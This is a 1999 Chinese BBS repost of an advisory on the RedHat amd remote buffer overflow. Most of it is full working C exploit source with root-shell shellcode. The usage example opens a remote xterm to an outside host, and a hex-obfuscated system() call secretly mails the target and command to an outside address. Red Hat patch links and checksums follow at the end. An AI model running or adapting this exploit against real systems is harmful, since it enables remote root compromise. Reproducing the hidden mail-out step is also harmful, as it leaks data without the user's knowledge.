● [转载] redhat远程溢出 (绿色兵团) - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: Pazu (海之魂), 信区: Linux
标  题: [转载]  redhat远程溢出 (绿色兵团)
发信站: BBS 荔园晨风站 (Tue Nov  2 08:03:02 1999), 转信

【以下文字转载自 Hacker 讨论区】
【原文由 Pazu 所发表】
Redhat amd()远程溢出漏洞
漏洞整理收集，成员goodwell

发现日期，1999.9.2
类型：远程溢出
amd(8) (exec)

影响版本： RedHat Linux 6.0 RedHat Linux 5.2 RedHat Linux 5.1 RedHat Linux 5.0
RedHat Linux 4.2

=========================================www.isbase.com=========================
===

begin amd-ex.c
----------------------------------------------------------------------
/*

    Amd Buffer Overflow for x86 linux

    Remote user can gain root access.

    Tested redhat linux : 4.0, 5.1, 6.0
    Tested am-utils version : 6.0

    What requires
    /usr/sbin/amq

    Usage
    $ amd-ex <hostname> <command> [offset]

    Warning : This program can crash amd.

    This program is only for demonstrative use only.
    USE IT AT YOUR OWN RISK!

    Programmed by Taeho Oh 1999/08/31

Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

*/

#include<stdio.h>
#include<stdlib.h>

#define OFFSET 0
#define RET_POSITION 1002
#define RANGE 20
#define NOP 0x90

char shellcode[1024]=
    "\xeb\x35" /* jmp 0x35 */
    "\x5e" /* popl %esi */
    "\x89\x76\x0b" /* movl %esi,0xb(%esi) */
    "\x89\xf0" /* movl %esi,%eax */
    "\x83\xc0\x08" /* addl $0x8,%eax */
    "\x89\x46\x0b" /* movl %eax,0xb(%esi) */
    "\x89\xf0" /* movl %esi,%eax */
    "\x83\xc0\x0b" /* addl $0xb,%eax */
    "\x89\x46\x0b" /* movl %eax,0xb(%esi) */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x88\x46\x07" /* movb %eax,0x7(%esi) */
    "\x88\x46\x0a" /* movb %eax,0xa(%esi) */
    "\x88\x46\x0b" /* movb %eax,0xb(%esi) */
    "\x89\x46\x0b" /* movl %eax,0xb(%esi) */
    "\xb0\x0b" /* movb $0xb,%al */
    "\x89\xf3" /* movl %esi,%ebx */
    "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */
    "\x8d\x56\x0b" /* leal 0xb(%esi),%edx */
    "\xcd\x80" /* int 0x80 */
    "\x31\xdb" /* xorl %ebx,%ebx */
    "\x89\xd8" /* movl %ebx,%eax */
    "\x40" /* inc %eax */
    "\xcd\x80" /* int 0x80 */
    "\xe8\xc6\xff\xff\xff" /* call -0x3a */
    "/bin/sh -c "; /* .string "/bin/sh -c "*/

char command[800];

void usage()
{
    printf("Warning : This program can crash amd\n");
    printf("Usage: amd-ex <hostname> <command> [offset]\n");
    printf("ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display
hacker.com:0\"\n");
}

int main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+1],*ptr;
    char target[256];
    char cmd[1024];
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;

    printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n");
    printf("PLUS ( Postech Laboratory for Unix Security )
http://postech.edu/plus\n");
    printf("PosLUG ( Postech Linux User Group )
http://postech.edu/group/poslug\n\n");

    if(argc<3)
    {
        usage();
        exit(1);
    }

    if(argc>2)
    {
        strcpy(target,argv[1]);
        strcpy(command,argv[2]);
    }
    if(argc>3)
        offset=atoi(argv[3]);

    shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
    shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
    shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
    shellcode[32]=(shellcode[32]+strlen(command));
    shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
    shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
    shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
    strcat(shellcode,command);

    strcpy(cmd,"\x65\x63\x68\x6f\x20");
    strcat(cmd,target);
    strcat(cmd,"\x20");
    strcat(cmd,command);
    strcat(cmd,"\x7c");
    strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
    strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
    strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
    strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");

    sp=0xbffff34d;
    addr=sp-offset;

    ptr=buff;
    addr_ptr=(long*)ptr;
    for(i=0;i<bsize;i+=4)
        *(addr_ptr++)=addr;

    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;

    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];

    buff[bsize-1]='\0';

    for(i=bsize;i>1;i--)
        buff[i-1]=buff[i-2];

    buff[bsize-1]='\0';

    printf("Jump to 0x%08x\n",addr);

    /* it's for script kiddies. */
    system(cmd);
    execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
}
----------------------------------------------------------------------
end amd-ex.c

--

Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

解决办法：
补丁：
RPMs required (for Red Hat Linux 6.0, 5.2 and 4.2 respectively): Intel:
ftp://updates.redhat.com/6.0/i386/am-utils-6.0.1s11-1.6.0.i386.rpm
ftp://updates.redhat.com/5.2/i386/am-utils-6.0.1s11-1.5.2.i386.rpm
ftp://updates.redhat.com/4.2/i386/am-utils-6.0.1s11-1.4.2.i386.rpm Alpha:
ftp://updates.redhat.com/6.0/alpha/am-utils-6.0.1s11-1.6.0.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/am-utils-6.0.1s11-1.5.2.alpha.rpm
ftp://updates.redhat.com/4.2/alpha/am-utils-6.0.1s11-1.4.2.alpha.rpm Sparc:
ftp://updates.redhat.com/6.0/sparc/am-utils-6.0.1s11-1.6.0.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/am-utils-6.0.1s11-1.5.2.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/am-utils-6.0.1s11-1.4.2.sparc.rpm Source
packages: ftp://updates.redhat.com/6.0/SRPMS/am-utils-6.0.1s11-1.6.0.src.rpm
ftp://updates.redhat.com/5.2/SRPMS/am-utils-6.0.1s11-1.5.2.src.rpm
ftp://updates.redhat.com/4.2/SRPMS/am-utils-6.0.1s11-1.4.2.src.rpm

MD5 sum Package Name -
--------------------------------------------------------------------------
0946dbc5539d208625eb27f506177ed2 i386/am-utils-6.0.1s11-1.6.0.i386.rpm
1a1ceb0ed50822776f605e60bbed1afb alpha/am-utils-6.0.1s11-1.6.0.alpha.rpm
b68c6f2780f11ca71947673124bd8f11 sparc/am-utils-6.0.1s11-1.6.0.sparc.rpm
275997ded7f0c85efa6229963e84f668 SRPMS/am-utils-6.0.1s11-1.6.0.src.rpm
e9a06fe4fdf56fdaa9fd984ef5988414 i386/am-utils-6.0.1s11-1.5.2.i386.rpm
617673437abaca052fe950c928722644
alpha/am-utils-6.0.1s11-1.5.2.alpha.rpm 23f3fbdf772eeb7ec67016d1c246225e
sparc/am-utils-6.0.1s11-1.5.2.sparc.rpm 01ade16e4171a92fb1c10641846044a7
SRPMS/am-utils-6.0.1s11-1.5.2.src.rpm cf75db7b60b1d27093685e345153dfcd
i386/am-utils-6.0.1s11-1.4.2.i386.rpm 3ec0520caa1a587133ea6cc105f4fc34
alpha/am-utils-6.0.1s11-1.4.2.alpha.rpm daf8bd0849c584e919fcd5ae8fb1e807
sparc/am-utils-6.0.1s11-1.4.2.sparc.rpm 0aa30be9b859eca2e003bb983c4839f5
SRPMS/am-utils-6.0.1s11-1.4.2.src.rpm

goodwell 1999.9.3

本文由绿色兵团成员原创,如要转载请保持文章的完整性
欢迎访问我们的站点http://www.isbase.com
绿色兵团给你安全的保证

--
※ 来源:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.0.189]
--
※ 转载:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.0.189]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店